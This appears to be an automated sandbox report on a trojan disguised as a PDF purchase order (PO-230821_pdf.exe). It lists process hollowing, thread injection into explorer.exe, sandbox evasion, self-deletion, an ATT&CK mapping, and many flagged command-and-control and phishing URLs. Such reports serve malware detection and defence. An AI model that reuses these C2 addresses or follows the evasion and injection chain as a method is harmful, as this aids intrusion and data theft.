          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4F4A0 mov eax, dword ptr fs:[00000030h]2_2_00A4F4A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4F4A0 mov eax, dword ptr fs:[00000030h]2_2_00A4F4A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4F4A0 mov eax, dword ptr fs:[00000030h]2_2_00A4F4A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4F4A0 mov eax, dword ptr fs:[00000030h]2_2_00A4F4A0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A444A1 mov eax, dword ptr fs:[00000030h]2_2_00A444A1
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A444A1 mov eax, dword ptr fs:[00000030h]2_2_00A444A1
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_0040ACE0 LdrLoadDll,2_2_0040ACE0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_1000270A SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_1000270A

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 1.1.1.1 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.7 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 35.233.138.132 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.129 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 217.70.184.50 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.149.87.45 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 107.148.25.122 80Jump to behavior
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: D10000Jump to behavior
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeSection loaded: unknown target: C:\Users\user\Desktop\PO-230821_pdf.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeThread register set: target process: 4376Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 4376Jump to behavior
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeProcess created: C:\Users\user\Desktop\PO-230821_pdf.exe C:\Users\user\Desktop\PO-230821_pdf.exeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\PO-230821_pdf.exe"Jump to behavior
          Source: explorer.exe, 00000003.00000000.1094883059.0000000001721000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3578384674.0000000001721000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.1094883059.0000000001721000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3602781912.00000000072A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3578384674.0000000001721000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.1094883059.0000000001721000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3578384674.0000000001721000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3554856830.0000000001182000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.3605338155.0000000008798000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1122088983.0000000008798000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndrXl
          Source: explorer.exe, 00000003.00000000.1094883059.0000000001721000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3578384674.0000000001721000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_10005C7B cpuid 0_2_10005C7B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_10002549 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,0_2_10002549
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts12
          Native API
          1
          DLL Side-Loading
          1
          Access Token Manipulation
          1
          Rootkit
          1
          Credential API Hooking
          1
          System Time Discovery
          Remote Services1
          Credential API Hooking
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules
          Boot or Logon Initialization Scripts512
          Process Injection
          2
          Virtualization/Sandbox Evasion
          LSASS Memory251
          Security Software Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          Exfiltration Over Bluetooth4
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)1
          DLL Side-Loading
          1
          Access Token Manipulation
          Security Account Manager2
          Virtualization/Sandbox Evasion
          SMB/Windows Admin Shares1
          Clipboard Data
          Automated Exfiltration3
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
          Process Injection
          NTDS2
          Process Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets1
          Application Window Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information
          Cached Domain Credentials2
          File and Directory Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Software Packing
          DCSync115
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1295108 Sample: PO-230821_pdf.exe Startdate: 22/08/2023 Architecture: WINDOWS Score: 100 33 www.zachmahl.com 2->33 35 www.uahrbqtj.cfd 2->35 37 13 other IPs or domains 2->37 45 Snort IDS alert for network traffic 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 10 other signatures 2->51 11 PO-230821_pdf.exe 18 2->11         started        signatures3 process4 file5 31 C:\Users\user\AppData\Local\...\hutskogno.dll, PE32 11->31 dropped 61 Detected unpacking (changes PE section rights) 11->61 63 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 11->63 65 Maps a DLL or memory area into another process 11->65 67 Tries to detect virtualization through RDTSC time measurements 11->67 15 PO-230821_pdf.exe 11->15         started        signatures6 process7 signatures8 69 Modifies the context of a thread in another process (thread injection) 15->69 71 Maps a DLL or memory area into another process 15->71 73 Sample uses process hollowing technique 15->73 75 Queues an APC in another process (thread injection) 15->75 18 explorer.exe 38 1 15->18 injected process9 dnsIp10 39 www.uahrbqtj.cfd 107.148.25.122, 49733, 80 PEGTECHINCUS United States 18->39 41 happy.zgag-zxxgagugue.com 1.1.1.1, 49710, 80 CLOUDFLARENETUS Australia 18->41 43 6 other IPs or domains 18->43 53 System process connects to network (likely due to code injection or exploit) 18->53 22 control.exe 18->22         started        25 autofmt.exe 18->25         started        signatures11 process12 signatures13 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 27 cmd.exe 1 22->27         started        process14 process15 29 conhost.exe 27->29         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          PO-230821_pdf.exe68%ReversingLabsWin32.Trojan.Nemesis
          PO-230821_pdf.exe42%VirustotalBrowse
          PO-230821_pdf.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll67%ReversingLabsWin32.Trojan.LokiBot
          No Antivirus matches
          SourceDetectionScannerLabelLink
          www.ownlegalhelp.com4%VirustotalBrowse
          td-ccm-neg-87-45.wixdns.net0%VirustotalBrowse
          www.bmmboo.com4%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://www.ahevrlh.xyz0%Avira URL Cloudsafe
          http://www.1wapws.topReferer:0%Avira URL Cloudsafe
          http://www.ahevrlh.xyzReferer:0%Avira URL Cloudsafe
          http://www.ymjblnvo.cfd/sn26/lJ100%Avira URL Cloudmalware
          http://www.kentuckywalkabout.com/sn26/www.qcdrxwr.cfd100%Avira URL Cloudmalware
          http://www.uahrbqtj.cfd/sn26/?kJBLpb8=ueTspPcvStQ4P/B/BGMviMSUI7+26iAWBkDAplOqW0XstMbPZQlOryCbf8ldO6To/Dtn&ML0tl=NZlpi100%Avira URL Cloudmalware
          http://www.974dp.comReferer:0%Avira URL Cloudsafe
          http://www.zachmahl.com/sn26/www.uahrbqtj.cfd100%Avira URL Cloudmalware
          http://www.wdlzzfkc.cfd0%Avira URL Cloudsafe
          http://www.4tbbwa.com/sn26/100%Avira URL Cloudmalware
          http://www.thirdmind.networkReferer:0%Avira URL Cloudsafe
          http://www.974dp.com/sn26/100%Avira URL Cloudmalware
          www.zachmahl.com/sn26/100%Avira URL Cloudmalware
          http://www.thewhiteorchidspa.com/sn26/100%Avira URL Cloudmalware
          http://www.bmmboo.com/sn26/100%Avira URL Cloudmalware
          https://powerpoint.office.comcember0%Avira URL Cloudsafe
          http://www.uedam.xyz/sn26/100%Avira URL Cloudphishing
          http://www.kentuckywalkabout.comReferer:0%Avira URL Cloudsafe
          http://www.ahevrlh.xyz/sn26/?kJBLpb8=K4V3qd++KPCvHN0rtQuWoGyJj5p2Mca2XR5lWleZSjXEQHmkvvLfGF2tUiVxqdSsVX/P&ML0tl=NZlpi100%Avira URL Cloudphishing
          http://www.974dp.com100%Avira URL Cloudmalware
          http://www.kentuckywalkabout.com100%Avira URL Cloudphishing
          http://www.974dp.com/sn26/www.bmmboo.com100%Avira URL Cloudmalware
          http://www.ownlegalhelp.com/sn26/100%Avira URL Cloudmalware
          http://www.thewhiteorchidspa.com/sn26/www.zachmahl.com100%Avira URL Cloudmalware
          http://www.canada-reservation.com100%Avira URL Cloudphishing
          http://www.qcdrxwr.cfd/sn26/www.uedam.xyz100%Avira URL Cloudphishing
          http://www.thirdmind.network/sn26/www.thewhiteorchidspa.com100%Avira URL Cloudmalware
          http://www.wdlzzfkc.cfdReferer:0%Avira URL Cloudsafe
          http://www.bmmboo.com/sn26/www.ownlegalhelp.com100%Avira URL Cloudmalware
          http://www.ymjblnvo.cfdReferer:0%Avira URL Cloudsafe
          http://www.uahrbqtj.cfd100%Avira URL Cloudmalware
          http://www.ymjblnvo.cfd/sn26/100%Avira URL Cloudmalware
          http://www.zachmahl.comReferer:0%Avira URL Cloudsafe
          http://www.bmmboo.com100%Avira URL Cloudmalware
          http://www.wdlzzfkc.cfd/sn26/www.canada-reservation.com100%Avira URL Cloudmalware
          http://www.thirdmind.network/sn26/?kJBLpb8=JTmN6zoWWGNjq6ib/pFFv2cag4i5j1OLo1K7cxhy0Qg9CF/c4lTnOzzR4r51HW/WUnmz&ML0tl=NZlpi100%Avira URL Cloudmalware
          http://www.zachmahl.com/sn26/100%Avira URL Cloudmalware
          http://www.ownlegalhelp.com100%Avira URL Cloudmalware
          http://www.thirdmind.network/sn26/100%Avira URL Cloudmalware
          http://www.thewhiteorchidspa.comReferer:0%Avira URL Cloudsafe
          http://www.thewhiteorchidspa.com100%Avira URL Cloudmalware
          http://www.4tbbwa.comReferer:0%Avira URL Cloudsafe
          http://www.uahrbqtj.cfd/sn26/100%Avira URL Cloudmalware
          http://www.ymjblnvo.cfd100%Avira URL Cloudmalware
          http://www.thirdmind.network100%Avira URL Cloudmalware
          http://www.4tbbwa.com/sn26/?kJBLpb8=CpYCJqaIXUbm3IVdfGXcfWVbwpqiZyf/2rRsJh0RGmHsf115fz67BvVx/+oGOa6+KG1D&ML0tl=NZlpi100%Avira URL Cloudmalware
          http://www.uedam.xyz100%Avira URL Cloudmalware
          http://www.ahevrlh.xyz/sn26/www.thirdmind.network100%Avira URL Cloudphishing
          http://www.ownlegalhelp.com/sn26/www.4tbbwa.com100%Avira URL Cloudmalware
          http://www.4tbbwa.com/sn26/www.ahevrlh.xyz100%Avira URL Cloudmalware
          http://www.4tbbwa.com100%Avira URL Cloudmalware
          http://www.qcdrxwr.cfd/sn26/100%Avira URL Cloudphishing
          http://www.bmmboo.comReferer:0%Avira URL Cloudsafe
          http://www.qcdrxwr.cfd100%Avira URL Cloudphishing
          http://www.canada-reservation.comReferer:0%Avira URL Cloudsafe
          http://www.uahrbqtj.cfd/sn26/www.wdlzzfkc.cfd100%Avira URL Cloudmalware
          http://www.uahrbqtj.cfdReferer:0%Avira URL Cloudsafe
          http://www.canada-reservation.com/sn26/www.kentuckywalkabout.com100%Avira URL Cloudmalware
          http://www.ownlegalhelp.com/sn26/?kJBLpb8=ad9cmfoqC6MwmQXB3DEhd3FKpHJj9M1rumkw8RT4btYHOQ1rLKeZlf6UtJZu69H1aK6T&ML0tl=NZlpi100%Avira URL Cloudmalware
          http://www.wdlzzfkc.cfd/sn26/100%Avira URL Cloudmalware
          http://www.1wapws.top/sn26/www.ymjblnvo.cfd100%Avira URL Cloudphishing
          http://www.canada-reservation.com/sn26/100%Avira URL Cloudmalware
          http://www.bmmboo.com/sn26/?kJBLpb8=EN17TsAzaZG5OYgbKAyh3RhQlZ+M+bHTnDIlweAI/VTqrT2/7Z1rXkvFwetHy2WBWOd9&ML0tl=NZlpi100%Avira URL Cloudmalware
          http://www.ahevrlh.xyz/sn26/100%Avira URL Cloudphishing
          http://www.uedam.xyzReferer:0%Avira URL Cloudsafe
          http://www.kentuckywalkabout.com/sn26/100%Avira URL Cloudmalware
          http://www.uedam.xyz/sn26/www.1wapws.top100%Avira URL Cloudphishing
          http://www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi100%Avira URL Cloudmalware
          http://www.qcdrxwr.cfdReferer:0%Avira URL Cloudsafe
          http://www.1wapws.top100%Avira URL Cloudmalware
          http://www.1wapws.top/sn26/100%Avira URL Cloudphishing
          http://www.zachmahl.com0%Avira URL Cloudsafe
          http://www.ownlegalhelp.comReferer:0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          webredir.vip.gandi.net
          217.70.184.50
          truefalse
            high
            www.ownlegalhelp.com
            35.233.138.132
            truefalseunknown
            www.bmmboo.com
            66.96.162.129
            truetrueunknown
            td-ccm-neg-87-45.wixdns.net
            34.149.87.45
            truetrueunknown
            4tbbwa.com
            34.102.136.180
            truefalse
              unknown
              www.uahrbqtj.cfd
              107.148.25.122
              truetrue
                unknown
                happy.zgag-zxxgagugue.com
                1.1.1.1
                truetrue
                  unknown
                  www.ahevrlh.xyz
                  188.114.97.7
                  truetrue
                    unknown
                    www.4tbbwa.com
                    unknown
                    unknowntrue
                      unknown
                      www.974dp.com
                      unknown
                      unknowntrue
                        unknown
                        www.thewhiteorchidspa.com
                        unknown
                        unknowntrue
                          unknown
                          www.thirdmind.network
                          unknown
                          unknowntrue
                            unknown
                            www.zachmahl.com
                            unknown
                            unknowntrue
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              http://www.uahrbqtj.cfd/sn26/?kJBLpb8=ueTspPcvStQ4P/B/BGMviMSUI7+26iAWBkDAplOqW0XstMbPZQlOryCbf8ldO6To/Dtn&ML0tl=NZlpitrue
                              • Avira URL Cloud: malware
                              unknown
                              www.zachmahl.com/sn26/true
                              • Avira URL Cloud: malware
                              low
                              http://www.ahevrlh.xyz/sn26/?kJBLpb8=K4V3qd++KPCvHN0rtQuWoGyJj5p2Mca2XR5lWleZSjXEQHmkvvLfGF2tUiVxqdSsVX/P&ML0tl=NZlpitrue
                              • Avira URL Cloud: phishing
                              unknown
                              http://www.thirdmind.network/sn26/?kJBLpb8=JTmN6zoWWGNjq6ib/pFFv2cag4i5j1OLo1K7cxhy0Qg9CF/c4lTnOzzR4r51HW/WUnmz&ML0tl=NZlpitrue
                              • Avira URL Cloud: malware
                              unknown
                              http://www.4tbbwa.com/sn26/?kJBLpb8=CpYCJqaIXUbm3IVdfGXcfWVbwpqiZyf/2rRsJh0RGmHsf115fz67BvVx/+oGOa6+KG1D&ML0tl=NZlpifalse
                              • Avira URL Cloud: malware
                              unknown
                              http://www.ownlegalhelp.com/sn26/?kJBLpb8=ad9cmfoqC6MwmQXB3DEhd3FKpHJj9M1rumkw8RT4btYHOQ1rLKeZlf6UtJZu69H1aK6T&ML0tl=NZlpifalse
                              • Avira URL Cloud: malware
                              unknown
                              http://www.bmmboo.com/sn26/?kJBLpb8=EN17TsAzaZG5OYgbKAyh3RhQlZ+M+bHTnDIlweAI/VTqrT2/7Z1rXkvFwetHy2WBWOd9&ML0tl=NZlpitrue
                              • Avira URL Cloud: malware
                              unknown
                              http://www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpitrue
                              • Avira URL Cloud: malware
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.thewhiteorchidspa.com/sn26/explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://www.4tbbwa.com/sn26/explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://www.ahevrlh.xyzexplorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.ahevrlh.xyzReferer:explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.kentuckywalkabout.com/sn26/www.qcdrxwr.cfdexplorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://www.1wapws.topReferer:explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.bmmboo.com/sn26/explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://www.uedam.xyz/sn26/explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmptrue
                              • Avira URL Cloud: phishing
                              unknown
                              http://www.ymjblnvo.cfd/sn26/lJexplorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              https://powerpoint.office.comcemberexplorer.exe, 00000003.00000002.3605338155.0000000008980000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1122088983.0000000008980000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.974dp.comReferer:explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.zachmahl.com/sn26/www.uahrbqtj.cfdexplorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              https://excel.office.comexplorer.exe, 00000003.00000002.3605338155.0000000008980000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1122088983.0000000008980000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                http://www.974dp.com/sn26/explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://www.wdlzzfkc.cfdexplorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.thirdmind.networkReferer:explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.kentuckywalkabout.comReferer:explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.974dp.comexplorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                http://www.974dp.com/sn26/www.bmmboo.comexplorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                http://www.thewhiteorchidspa.com/sn26/www.zachmahl.comexplorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                http://www.canada-reservation.comexplorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: phishing
                                unknown
                                http://www.ownlegalhelp.com/sn26/explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
